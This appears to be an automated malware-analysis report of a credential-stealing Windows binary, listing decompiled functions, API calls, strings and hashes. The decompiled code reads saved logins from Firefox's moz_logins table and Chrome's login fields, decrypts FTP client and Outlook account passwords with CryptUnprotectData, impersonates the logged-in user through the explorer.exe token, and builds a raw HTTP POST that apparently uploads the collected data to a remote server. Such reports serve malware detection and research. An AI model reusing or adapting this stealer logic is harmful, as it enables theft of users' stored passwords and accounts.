Opcode Fuzzy Hash: 5cb0668236f4ab21225d3fc1a8a4d9074842248b6d3c0c65b2de98502e910106
Instruction Fuzzy Hash: 6F912571910209EADF11AFA1CC46BEEBEB5AF44308F20443BF011722E2DBB94D91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040926B, Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040926B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t58;
				void* _t61;
				char* _t64;
				char* _t65;
				int _t66;
				int _t82;
				void* _t83;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;

				_t83 = __ecx;
				_t45 = E00401F36(_a8);
				if(_t45 != 0) {
					_t47 = E0040413F(_a8);
					if(_t47 == 0) {
						_t49 = E00409061(_t47, _a12, _a16);
						if(_t49 != 0) {
							_t51 = E004024D6("mozsqlite3.dll", 0x416018);
							if(_t51 == 0) {
								_t51 = E004024D6("sqlite3.dll", 0x416018);
							}
							if(_t51 != 0) {
								_t55 =  *0x416018(_a8,  &_v8);
								_t88 = _t87 + 8;
								if(_t55 == 0) {
									_t58 =  *0x416020(_v8, "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_v12, 0);
									_t89 = _t88 + 0x14;
									if(_t58 == 0) {
										while(1) {
											_t61 =  *0x416024(_v12);
											_t89 = _t89 + 4;
											if(_t61 != 0x64) {
												break;
											}
											_t64 = E0040923F(_v12, 0,  &_v16);
											if(_t64 != 0 && _v16 != 0 &&  *_t64 != 0) {
												_t65 = E004018CF(_v16 + 1);
												_t86 = _t64;
												_v28 = _t65;
												_t66 = E00401906(_t86, _v28, _v16);
												_v20 = 0;
												_v24 = 0;
												if( *0x416030 != 0) {
													if( *0x416030 != 1) {
														if( *0x416030 == 2) {
															_t66 = 0;
														}
													} else {
														_push("ftp.");
														L0041066A();
														_t66 = StrCmpNIA(_v28, "ftp.", _t66);
													}
												} else {
													_push("ftp://");
													L0041066A();
													_t82 = StrCmpNIA(_v28, "ftp://", _t66);
													if(_t82 != 0) {
														_push("http://");
														L0041066A();
														_t82 = StrCmpNIA(_v28, "http://", _t82);
													}
													_t66 = _t82;
													if(_t66 != 0) {
														_push("https://");
														L0041066A();
														_t66 = StrCmpNIA(_v28, "https://", _t66);
													}
												}
												if(_t66 == 0) {
													_v20 = E00409142(_t83, E0040923F(_v12, 1,  &_v16), _v16);
													_v24 = E00409142(_t83, E0040923F(_v12, 2,  &_v16), _v16);
													if(_v28 != 0 && _v24 != 0) {
														E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v28), _a4, _v20), _a4, _v24);
													}
												}
												E004018B8(_v20);
												E004018B8(_v24);
												E004018B8(_v28);
											}
										}
									}
									 *0x41601c(_v8);
								}
							}
							return E00409119();
						} else {
							return _t49;
						}
					} else {
						return _t47;
					}
				} else {
					return _t45;
				}
			}

0x0040926b
0x00409279
0x0040927b
0x00409289
0x0040928b
0x0040929c
0x0040929e
0x004092b3
0x004092b5
0x004092c1
0x004092c1
0x004092c8
0x004092d5
0x004092db
0x004092e0
0x004092f6
0x004092fc
0x00409301
0x00409307
0x0040930a
0x00409310
0x00409316
0x00000000
0x00000000
0x0040932b
0x0040932d
0x0040934c
0x00409351
0x00409352
0x0040935c
0x00409361
0x00409368
0x00409376
0x004093d1
0x004093f4
0x004093f6
0x004093f6
0x004093d3
0x004093d3
0x004093d8
0x004093e6
0x004093e6
0x00409378
0x00409378
0x0040937d
0x00409390
0x00409392
0x00409394
0x00409399
0x004093a7
0x004093a7
0x004093ac
0x004093ae
0x004093b0
0x004093b5
0x004093c3
0x004093c3
0x004093ae
0x004093fa
0x00409413
0x0040942d
0x00409434
0x00409465
0x00409465
0x00409434
0x0040946d
0x00409475
0x0040947d
0x0040947d
0x00409482
0x00409318
0x0040948a
0x00409490
0x004092e0
0x00409499
0x004092a1
0x004092a1
0x004092a1
0x0040928e
0x0040928e
0x0040928e
0x0040927e
0x0040927e
0x0040927e

Strings

sqlite3.dll, xrefs: 004092BC
https://, xrefs: 004093B0, 004093BB
ftp., xrefs: 004093D3, 004093DE
ftp://, xrefs: 00409378, 00409383
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 004092EE
http://, xrefs: 00409394, 0040939F
mozsqlite3.dll, xrefs: 004092A9

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
API String ID: 0-3560805513
Opcode ID: 1305b2d7dbd87bdcba0efca0d3b8a8fe3f3a9e84d79a5bf18c92add6ae8d1bcf
Instruction ID: 0b43bc70ff64a1734e0ce49f563043eae91eb0b2240d540db883058d32c88b0f
Opcode Fuzzy Hash: 1305b2d7dbd87bdcba0efca0d3b8a8fe3f3a9e84d79a5bf18c92add6ae8d1bcf
Instruction Fuzzy Hash: 02512870900109BADF11AFA1CD06AEE7F75AB54349F10443BB512B01E3D7B98EA1EA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC3E, Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC3E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				char _v60;
				char _v64;
				char _v68;

				_v8 = E004018CF(0x2000);
				_v12 = E004018CF(0x2000);
				_v16 = E004018CF(0x2000);
				_v20 = E004018CF(0x2000);
				_v24 = E004018CF(0x2000);
				_v28 = E004018CF(0x2000);
				_v32 = E004018CF(0x2000);
				wsprintfA(_v8, "SiteServer %d\\Host", _a12);
				wsprintfA(_v12, "SiteServer %d\\WebUrl", _a12);
				wsprintfA(_v16, "SiteServer %d\\Remote Directory", _a12);
				wsprintfA(_v20, "SiteServer %d-User", _a12);
				wsprintfA(_v24, "SiteServer %d-User PW", _a12);
				wsprintfA(_v28, "%s\\Keychain", _a8);
				wsprintfA(_v32, "SiteServer %d\\SFTP", _a12);
				_v36 = E00401D71( *0x414869, _a8, _v8, 0);
				_v40 = E00401D71( *0x414869, _a8, _v12, 0);
				_v44 = E00401D71( *0x414869, _a8, _v16, 0);
				_v48 = E00401D71( *0x414869, _v28, _v20, 0);
				_v52 = E00401D71( *0x414869, _v28, _v24, 0);
				_v56 = E00401D71( *0x414869, _a8, _v32,  &_v68);
				if(_v36 != 0 && _v48 != 0 && _v52 != 0 && E0040AB24( &_v64, _v48,  &_v64) != 0 && _v64 != 0 && E0040AB24( &_v60, _v52,  &_v60) != 0 && _v60 != 0) {
					E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v36), _a4, _v40), _a4, _v44);
					E0040159F(_a4, _v48, _v64);
					E0040159F(_a4, _v52, _v60);
					if(_v56 == 0 || _v68 != 4) {
						E00401569(_a4, 0);
					} else {
						E00401569(_a4,  *_v56);
					}
				}
				E004018B8(_v8);
				E004018B8(_v12);
				E004018B8(_v16);
				E004018B8(_v20);
				E004018B8(_v24);
				E004018B8(_v28);
				E004018B8(_v32);
				E004018B8(_v36);
				E004018B8(_v40);
				E004018B8(_v44);
				E004018B8(_v48);
				E004018B8(_v52);
				return E004018B8(_v56);
			}

0x0040ac4e
0x0040ac5b
0x0040ac68
0x0040ac75
0x0040ac82
0x0040ac8f
0x0040ac9c
0x0040acaa
0x0040acbd
0x0040acd0
0x0040ace3
0x0040acf6
0x0040ad09
0x0040ad1c
0x0040ad37
0x0040ad4d
0x0040ad63
0x0040ad79
0x0040ad8f
0x0040ada7
0x0040adae
0x0040ae25
0x0040ae33
0x0040ae41
0x0040ae4a
0x0040ae66
0x0040ae52
0x0040ae5a
0x0040ae5a
0x0040ae4a
0x0040ae6e
0x0040ae76
0x0040ae7e
0x0040ae86
0x0040ae8e
0x0040ae96
0x0040ae9e
0x0040aea6
0x0040aeae
0x0040aeb6
0x0040aebe
0x0040aec6
0x0040aed4

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

wsprintfA.USER32 ref: 0040ACAA
wsprintfA.USER32 ref: 0040ACBD
wsprintfA.USER32 ref: 0040ACD0
wsprintfA.USER32 ref: 0040ACE3
wsprintfA.USER32 ref: 0040ACF6
wsprintfA.USER32 ref: 0040AD09
wsprintfA.USER32 ref: 0040AD1C

Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39

Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24

Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7

Strings

SiteServer %d\SFTP, xrefs: 0040AD14
SiteServer %d\Host, xrefs: 0040ACA2
%s\Keychain, xrefs: 0040AD01
SiteServer %d\Remote Directory, xrefs: 0040ACC8
SiteServer %d\WebUrl, xrefs: 0040ACB5
SiteServer %d-User PW, xrefs: 0040ACEE
SiteServer %d-User, xrefs: 0040ACDB

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 3846021373-1012938452
Opcode ID: 2d1ca3080265c7f42f5185a726124574c918e8fca9382bae30428a6d71d2bfa4
Instruction ID: 1bba98e3d6ebe3bfaf8854b06724a853d0d9b8747224fc931b02987156b93079
Opcode Fuzzy Hash: 2d1ca3080265c7f42f5185a726124574c918e8fca9382bae30428a6d71d2bfa4
Instruction Fuzzy Hash: 6861B532940208BAEF127FA1DC42EEDBA72AF04344F14853AF914741F1D77A5AA4EB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F545, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040F545(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				char _v3076;
				int _v3080;
				int _v3084;
				intOrPtr _v3088;
				char _v3092;
				char _v3096;
				char _v3100;
				intOrPtr _v3104;
				void* _t56;
				char* _t57;
				char* _t58;
				char* _t59;
				char* _t60;
				void* _t61;

				_t61 = __ecx;
				E0040A2A9(_a4,  &_v1028, _a20);
				E0040A2F4(_a4, _a8,  &_v2052, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
				_v3092 = 0x10;
				_v3088 = 2;
				_v3084 = 0;
				_v3080 = 0;
				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
				if(_v3100 == 0 || _v3096 == 0) {
					return _t56;
				} else {
					_push("identification");
					_t57 =  &_v1028;
					_push(_t57);
					L00410712();
					if(_t57 == 0) {
						L4:
						_v3104 = 0xbeef0005;
						_push("inetcomm server passwords");
						_t58 =  &_v2052;
						_push(_t58);
						L00410712();
						if(_t58 == 0) {
							L7:
							if(_v3104 != 0xbeef0007) {
								_t59 = E0040F456(_t61, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
							} else {
								_t59 = E0040F456(_t61, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
							}
							L10:
							_push(_v3096);
							L0041079C();
							return _t59;
						}
						_v3104 = 0xbeef0006;
						_push("outlook account manager passwords");
						_t60 =  &_v2052;
						_push(_t60);
						L00410712();
						if(_t60 == 0) {
							goto L7;
						}
						_v3104 = 0xbeef0007;
						_push("identities");
						_t59 =  &_v2052;
						_push(_t59);
						L00410712();
						if(_t59 != 0) {
							goto L10;
						}
						goto L7;
					}
					_push("identitymgr");
					_t59 =  &_v1028;
					_push(_t59);
					L00410712();
					if(_t59 != 0) {
						goto L10;
					}
					goto L4;
				}
			}

0x0040f545
0x0040f55b
0x0040f570
0x0040f58e
0x0040f593
0x0040f59d
0x0040f5a7
0x0040f5b1
0x0040f5e5
0x0040f5ef
0x0040f6eb
0x0040f602
0x0040f602
0x0040f607
0x0040f60d
0x0040f60e
0x0040f615
0x0040f630
0x0040f630
0x0040f63a
0x0040f63f
0x0040f645
0x0040f646
0x0040f64d
0x0040f68d
0x0040f697
0x0040f6da
0x0040f699
0x0040f6b6
0x0040f6b6
0x0040f6df
0x0040f6df
0x0040f6e5
0x00000000
0x0040f6e5
0x0040f64f
0x0040f659
0x0040f65e
0x0040f664
0x0040f665
0x0040f66c
0x00000000
0x00000000
0x0040f66e
0x0040f678
0x0040f67d
0x0040f683
0x0040f684
0x0040f68b
0x00000000
0x00000000
0x00000000
0x0040f68b
0x0040f617
0x0040f61c
0x0040f622
0x0040f623
0x0040f62a
0x00000000
0x00000000
0x00000000
0x0040f62a

APIs

Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
Part of subcall function 0040A2A9: 73D5A680.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB

Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
Part of subcall function 0040A2F4: 73D5A680.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A339

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
lstrcmpi.KERNEL32(?,identification), ref: 0040F60E
lstrcmpi.KERNEL32(?,identitymgr), ref: 0040F623
lstrcmpi.KERNEL32(?,inetcomm server passwords), ref: 0040F646
lstrcmpi.KERNEL32(?,outlook account manager passwords), ref: 0040F665
lstrcmpi.KERNEL32(?,identities), ref: 0040F684
73D5A680.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F6E5

Strings

identitymgr, xrefs: 0040F617
outlook account manager passwords, xrefs: 0040F659
identities, xrefs: 0040F678
inetcomm server passwords, xrefs: 0040F63A
identification, xrefs: 0040F602

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$A680ByteCharMultiWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 4057083374-4287852900
Opcode ID: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
Instruction ID: 5defee22b8e27fb871682b6a3356ac2aeb954d56b4ddb1cb6db0f340d7122943
Opcode Fuzzy Hash: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
Instruction Fuzzy Hash: FF416F7180021DABEF219F50CD41FDA7779BF05304F0045B6B604751E2DBB99AE99F98

Uniqueness

Uniqueness Score: -1.00%

Function 00402E2F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402E2F(void* __ebx) {
				int _t23;
				void* _t31;
				void* _t34;
				void* _t43;
				void* _t45;
				int _t47;
				void* _t48;

				_t45 = __ebx;
				while(1) {
					L14:
					_t23 = Process32Next( *(_t48 - 0x138), _t48 - 0x134);
					L1:
					if(_t23 != 0) {
						L2:
						if(StrStrIA(_t48 - 0x110, "explorer.exe") == 0) {
							L14:
							_t23 = Process32Next( *(_t48 - 0x138), _t48 - 0x134);
							goto L1;
						} else {
							L3:
							 *(_t48 - 0x13c) = 0;
							_t31 =  *0x414aef( *(_t48 - 0x12c), _t48 - 0x13c);
							_t47 =  *(_t48 - 0x13c);
							if(_t31 == 0 || _t47 !=  *((intOrPtr*)(_t48 - 0xc))) {
								continue;
							} else {
								L5:
								_t34 = OpenProcess(0x2000000, 0,  *(_t48 - 0x12c));
								if(_t34 == 0) {
									continue;
								} else {
									L6:
									 *(_t48 - 8) = _t34;
									if(OpenProcessToken( *(_t48 - 8), 0x201eb, _t48 - 4) == 0) {
										CloseHandle( *(_t48 - 8));
										continue;
										do {
											do {
												do {
													goto L14;
												} while (StrStrIA(_t48 - 0x110, "explorer.exe") == 0);
												goto L3;
											} while (_t31 == 0 || _t47 !=  *((intOrPtr*)(_t48 - 0xc)));
											goto L5;
										} while (_t34 == 0);
										goto L6;
									} else {
										if(ImpersonateLoggedOnUser( *(_t48 - 4)) == 0) {
											CloseHandle( *(_t48 - 4));
											CloseHandle( *(_t48 - 8));
											while(1) {
												L14:
												_t23 = Process32Next( *(_t48 - 0x138), _t48 - 0x134);
												goto L1;
											}
										} else {
											_t45 = _t45 + 1;
											 *(_t48 - 0x140) = 0;
											_t43 = _t48 - 0x140;
											_push(_t43);
											_push(0xf003f);
											L004107E4();
											if(_t43 == 0 &&  *(_t48 - 0x140) != 0) {
												 *0x414869 =  *(_t48 - 0x140);
											}
										}
									}
								}
							}
						}
					}
					CloseHandle( *(_t48 - 0x138));
					return _t45;
				}
			}

0x00402e2f
0x00402e4b
0x00402e4b
0x00402e58
0x00402d67
0x00402d69
0x00402d6f
0x00402d82
0x00402e4b
0x00402e58
0x00000000
0x00402d88
0x00402d88
0x00402d88
0x00402d9f
0x00402da5
0x00402dad
0x00000000
0x00402dbc
0x00402dbc
0x00402dce
0x00402dd0
0x00000000
0x00402dd2
0x00402dd2
0x00402dd2
0x00402de9
0x00402e46
0x00402e46
0x00402e4b
0x00402e4b
0x00402e4b
0x00000000
0x00000000
0x00000000
0x00402e4b
0x00000000
0x00402e4b
0x00000000
0x00402deb
0x00402df6
0x00402e34
0x00402e3c
0x00402e4b
0x00402e4b
0x00402e58
0x00000000
0x00402e5d
0x00402df8
0x00402df8
0x00402df9
0x00402e03
0x00402e09
0x00402e0a
0x00402e0f
0x00402e16
0x00402e27
0x00402e27
0x00402e2d
0x00402df6
0x00402de9
0x00402dd0
0x00402dad
0x00402d82
0x00402e68
0x00402e71
0x00402e71

APIs

StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402D7B
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402D9F
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
CloseHandle.KERNEL32(?), ref: 00402E34
CloseHandle.KERNEL32(?,?), ref: 00402E3C
CloseHandle.KERNEL32(?), ref: 00402E46
Process32Next.KERNEL32 ref: 00402E58
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402E68

Strings

explorer.exe, xrefs: 00402D6F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
Instruction ID: 32ad39438d36eb2c4f1d55e69c665a30fc6644003667a0189b3d930331164acb
Opcode Fuzzy Hash: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
Instruction Fuzzy Hash: 8F210031940118AADF219B61DD49BEEB7B4AB08344F1044F6E209B11E0DBB89FC5DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA3C, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040BA3C(char* _a4, intOrPtr _a8) {
				void* _t12;
				char* _t15;
				void* _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char* _t24;

				E004028FE(_t12, _a4);
				_t15 = StrStrIA(_a4, 0x4164c1);
				if(_t15 != 0) {
					 *_t15 = 0;
					_t16 = E004028FE(_t15, _a4);
					_t24 = "CONSTRAINT";
					while(1) {
						_push(_a4);
						_push(_t24);
						L00410712();
						_t17 = _t16;
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						_t16 = 0;
						asm("repne scasb");
						if( *_t24 != 0) {
							continue;
						} else {
							_push(_a4);
							L0041066A();
							if(0 != 0) {
								_push("origin_url");
								_push(_a4);
								L00410712();
								_t19 = 0;
								if(0 == 0) {
									_push(_a8);
									_pop( *0x418e9c);
								}
								_push("password_value");
								_push(_a4);
								L00410712();
								_t20 = _t19;
								if(_t20 == 0) {
									_push(_a8);
									_pop( *0x418ea0);
								}
								_push("username_value");
								_push(_a4);
								L00410712();
								if(_t20 == 0) {
									_push(_a8);
									_pop( *0x418ea4);
								}
								return 1;
							} else {
								return 0;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t15;
				}
				L15:
			}

0x0040ba43
0x0040ba55
0x0040ba57
0x0040ba5e
0x0040ba64
0x0040ba69
0x0040ba6e
0x0040ba6e
0x0040ba71
0x0040ba72
0x0040ba77
0x0040ba79
0x00000000
0x00000000
0x0040ba80
0x0040ba81
0x0040ba88
0x0040ba8c
0x00000000
0x0040ba8e
0x0040ba8e
0x0040ba91
0x0040ba98
0x0040ba9f
0x0040baa4
0x0040baa7
0x0040baac
0x0040baae
0x0040bab0
0x0040bab3
0x0040bab3
0x0040bab9
0x0040babe
0x0040bac1
0x0040bac6
0x0040bac8
0x0040baca
0x0040bacd
0x0040bacd
0x0040bad3
0x0040bad8
0x0040badb
0x0040bae2
0x0040bae4
0x0040bae7
0x0040bae7
0x0040baf4
0x0040ba9c
0x0040ba9c
0x0040ba9c
0x0040ba98
0x00000000
0x0040ba8c
0x0040ba7d
0x0040ba5b
0x0040ba5b
0x0040ba5b
0x00000000

APIs

Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932

StrStrIA.SHLWAPI(?,004164C1), ref: 0040BA50
lstrcmpi.KERNEL32(CONSTRAINT,?), ref: 0040BA72

Strings

CONSTRAINT, xrefs: 0040BA69, 0040BA71
username_value, xrefs: 0040BAD3
password_value, xrefs: 0040BAB9
origin_url, xrefs: 0040BA9F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
Instruction ID: a2f71f728c42a4325fa4d28dd5602d5680443d2fae4c4e77b8657f15ca9af250
Opcode Fuzzy Hash: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
Instruction Fuzzy Hash: 9C111276310109B9CF116F25EC029DE7F91EB51398B008136F819A51E2D7F9DAE1AB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403DE5, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403DE5(void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
				long _v16;
				void* _v20;
				signed int _v40;
				long _v44;
				int _v48;
				void* _v64;
				intOrPtr _v68;
				CHAR* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				int _t71;
				int _t77;
				int _t82;
				void* _t83;
				int _t85;
				int _t89;

				_v88 = 0;
				_t89 = 0;
				_v68 = E004018CF(0x1000);
				_v76 = E004018CF(0x1000);
				_v72 = E004018CF(0x1000);
				memset( &_v64, 0, 0x3c << 0);
				_v64 = 0x3c;
				_push(_v68);
				_pop( *_t9);
				_push(_v76);
				_pop( *_t11);
				_v44 = 0xfff;
				_v16 = 0xfff;
				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
				} else {
					_v84 = 0xfff;
					_t71 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
					__eflags = _t71;
					if(_t71 != 0) {
						 *_v76 = 0;
						memset( &_v64, 0, 0x3c << 0);
						_v64 = 0x3c;
						_push(_v76);
						_pop( *_t26);
						_v44 = 0xfff;
						_v16 = 0xfff;
						_t77 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
						__eflags = _t77;
						if(_t77 == 0) {
							L7:
							L18:
							E004018B8(_v68);
							E004018B8(_v72);
							E004018B8(_v76);
							if(_v88 != 0) {
								E004018B8(_v88);
							}
							return _t89;
						}
						__eflags = _v48;
						if(_v48 != 0) {
							wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nContent-Length: %lu\r\nConnection: close\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n", _v76, _v68, _a12);
							_t82 = E00403800(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff);
							__eflags = _t82;
							if(_t82 != 0) {
								_v80 = _t82;
								_t83 = E00403DB7(_v80);
								_push(_v72);
								L0041066A();
								_t85 = E00403884(_v80, _v72, _t83);
								__eflags = _t85;
								if(_t85 != 0) {
									__eflags = _a12;
									if(_a12 == 0) {
										L15:
										_t89 = _t85;
										__eflags = _t89;
										if(__eflags != 0) {
											_t89 = E00403A78(0, __eflags, _v80, _a16,  &_v88);
										}
										L17:
										_push(_v80);
										L00410844();
										goto L18;
									}
									_t85 = E00403884(_v80, _a8, _a12);
									__eflags = _t85;
									if(_t85 != 0) {
										goto L15;
									}
									goto L17;
								}
								goto L17;
							}
							goto L18;
						}
						goto L7;
					}
				}
			}

0x00403ded
0x00403df4
0x00403e00
0x00403e0d
0x00403e1a
0x00403e27
0x00403e29
0x00403e30
0x00403e33
0x00403e36
0x00403e39
0x00403e3c
0x00403e43
0x00403e5f
0x00403e6c
0x00403e6c
0x00403e83
0x00403e88
0x00403e8a
0x00403e94
0x00403ea1
0x00403ea3
0x00403eaa
0x00403ead
0x00403eb0
0x00403eb7
0x00403ec9
0x00403ece
0x00403ed0
0x00403ed8
0x00403f69
0x00403f6c
0x00403f74
0x00403f7c
0x00403f85
0x00403f8a
0x00403f8a
0x00403f94
0x00403f94
0x00403ed2
0x00403ed6
0x00403eee
0x00403f05
0x00403f05
0x00403f07
0x00403f0b
0x00403f11
0x00403f16
0x00403f19
0x00403f2a
0x00403f2a
0x00403f2c
0x00403f30
0x00403f34
0x00403f4a
0x00403f4c
0x00403f4c
0x00403f4e
0x00403f5f
0x00403f5f
0x00403f61
0x00403f61
0x00403f64
0x00000000
0x00403f64
0x00403f44
0x00403f44
0x00403f46
0x00000000
0x00000000
0x00000000
0x00403f48
0x00000000
0x00403f2e
0x00000000
0x00403f09
0x00000000
0x00403ed6
0x00403e8c

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
wsprintfA.USER32 ref: 00403EEE

Part of subcall function 00403DB7: 6FC113A0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403DDC

lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403F64

Strings

<, xrefs: 00403EA3
